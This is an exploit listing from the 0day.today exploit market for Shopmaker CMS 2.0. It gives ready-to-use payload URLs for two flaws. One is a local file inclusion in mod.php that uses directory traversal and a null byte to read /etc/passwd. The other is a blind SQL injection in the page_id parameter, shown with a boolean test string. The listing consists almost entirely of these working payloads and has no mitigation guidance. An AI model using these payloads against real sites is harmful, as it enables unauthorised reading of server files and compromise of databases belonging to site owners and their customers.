[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Shopmaker CMS 2.0 (bSQL/ LFI) Multiple Remote Vulnerabilities

Author
Platen
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5613
Category
web applications
Date add
03-08-2009
Platform
unsorted
=============================================================
Shopmaker CMS 2.0 (bSQL/ LFI) Multiple Remote Vulnerabilities
=============================================================


  Shopmaker CMS (bSQL/LFI) Multiple Remote Vulnerabilities


==============================================================================

Software : Shopmaker Asp 
version  : version 2.0
Vendor   : http://www.shopmaker.dk/
Author   : Platen
==============================================================================


[LFI]

http://127.1.1.7/mod.php?mod=[LFI]

--------------------------------------------------------------------------

[BLIND SQL INJECTION ]

http://127.0.0.1/mod.php?mod=userpage&menu=130105&page_id=[BLIND]


--------------------------------------------------------------------------

exp:

lfi  ~~~~~~>  http://www.xxx.com/mod.php?mod=../../../../../../../../../../etc/passwd%00
                          
--------------------------------------------------------------------------
exp:

BLND ~~~~~~>  http://www.xxx.com:80/mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+




#  0day.today [2024-07-02]  #